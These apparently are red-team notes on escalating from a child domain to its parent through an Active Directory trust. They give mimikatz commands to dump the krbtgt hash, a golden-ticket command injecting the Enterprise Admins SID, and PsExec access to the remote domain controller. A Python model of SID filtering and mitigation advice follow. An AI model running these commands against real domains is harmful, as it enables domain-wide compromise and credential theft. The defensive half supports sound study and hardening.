Example attack: trust

Get KRBTGT secret

lsadump::lsa /inject /name:krbtgt
hashdump
dcsync_ntlm krbtgt

Hash NTLM: 7c7865e6e30e54e8845aad091b0ff447

Get SID of current domain

Get-DomainSID -Domain OPS.COMPLY.COM
S-1-5-21-2032401531-514583578-4118054891

Get SID of target domain

Get-DomainSID -Domain COMPLY.COM
S-1-5-21-1135011135-3178090508-3151492220

Generate Golden Ticket

/domain and /sid refer to the current domain; /sids takes the SID of the target domain on the other side of the trust.

Don't forget to append -519 to the /sids value: 519 is the well-known RID for Enterprise Admins, so the injected SID is the target domain's SID followed by -519.

kerberos::golden /user:h4x /domain:OPS.COMPLY.COM /sid:S-1-5-21-2032401531-514583578-4118054891 /krbtgt:7c7865e6e30e54e8845aad091b0ff447 /sids:S-1-5-21-1135011135-3178090508-3151492220-519 /ptt

Can now access DC in other domain!

.\PsExec64.exe -s \\rdc02 cmd -accepteula
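The reason the ticket above is honoured by the other domain is that the extra SID travels in the PAC's SID history and the receiving domain does not strip it. The following is an added example (not part of the original notes and not mimikatz or PowerView code) that models, in simplified form, what SID filtering does with that extra SID and what a defender looks for when auditing a ticket's SID list or an account's sIDHistory: SIDs that claim a high-value RID in a domain other than the one that issued them. The domain SIDs are the two from the notes; the function names and the HIGH_VALUE_RIDS table are assumptions of this example.

```python
"""Simplified model of SID filtering and of a SID-history audit check.

Added example: not code from the original notes, from mimikatz or from
PowerView. The two domain SIDs are the ones shown in the notes; the helper
names and the RID table are this example's own assumptions.
"""
import re

# Well-known RIDs that a forged SID history usually relies on. 519 is the
# Enterprise Admins RID referenced in the notes.
HIGH_VALUE_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    518: "Schema Admins",
    519: "Enterprise Admins",
}

# Domain SID: S-1-5-21-<a>-<b>-<c>, optionally followed by -<rid>.
SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}(?:-(\d+))?$")


def split_sid(sid):
    """Return (domain_sid, rid). A bare domain SID yields rid None."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain SID: {sid}")
    rid = m.group(1)
    if rid is None:
        return sid, None
    return sid[: -(len(rid) + 1)], int(rid)


def filter_extra_sids(trusted_domain_sid, extra_sids):
    """SID filtering (quarantine) as the trusting domain applies it.

    Only SIDs that belong to the trusted domain that issued the ticket are
    kept; every other SID in the SID history is dropped. Returns
    (kept, dropped).
    """
    kept, dropped = [], []
    for sid in extra_sids:
        domain_sid, _ = split_sid(sid)
        (kept if domain_sid == trusted_domain_sid else dropped).append(sid)
    return kept, dropped


def flag_privileged_sids(protected_domain_sid, sids):
    """Audit view: SIDs that claim a high-value RID in protected_domain_sid.

    Returns (sid, group_name) pairs. Run this over the SIDs a cross-trust
    ticket presents, or over sIDHistory values, to spot injected admin SIDs.
    """
    hits = []
    for sid in sids:
        domain_sid, rid = split_sid(sid)
        if domain_sid == protected_domain_sid and rid in HIGH_VALUE_RIDS:
            hits.append((sid, HIGH_VALUE_RIDS[rid]))
    return hits


# Domain SIDs taken from the notes above.
CURRENT_DOMAIN_SID = "S-1-5-21-2032401531-514583578-4118054891"   # OPS.COMPLY.COM
TARGET_DOMAIN_SID = "S-1-5-21-1135011135-3178090508-3151492220"   # COMPLY.COM

# Constructed SID history for illustration: the injected Enterprise Admins
# SID from the notes plus one ordinary group SID from the issuing domain.
SAMPLE_EXTRA_SIDS = [
    TARGET_DOMAIN_SID + "-519",
    CURRENT_DOMAIN_SID + "-1105",
]


if __name__ == "__main__":
    kept, dropped = filter_extra_sids(CURRENT_DOMAIN_SID, SAMPLE_EXTRA_SIDS)
    print("kept after SID filtering:   ", kept)
    print("dropped after SID filtering:", dropped)
    for sid, group in flag_privileged_sids(TARGET_DOMAIN_SID, SAMPLE_EXTRA_SIDS):
        print(f"ALERT: foreign-issued ticket carries {group} SID {sid}")
```

With SID filtering in quarantine mode the injected ...-519 SID is dropped before the receiving domain builds the access token, which is what defeats this technique on a forest trust, where quarantine is on by default. On a parent-child trust inside one forest it is off by default, which is why the forest, not the domain, is the security boundary; the audit check is the practical control there, alongside treating every child domain DC as tier 0 and rotating krbtgt twice after any suspected compromise.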
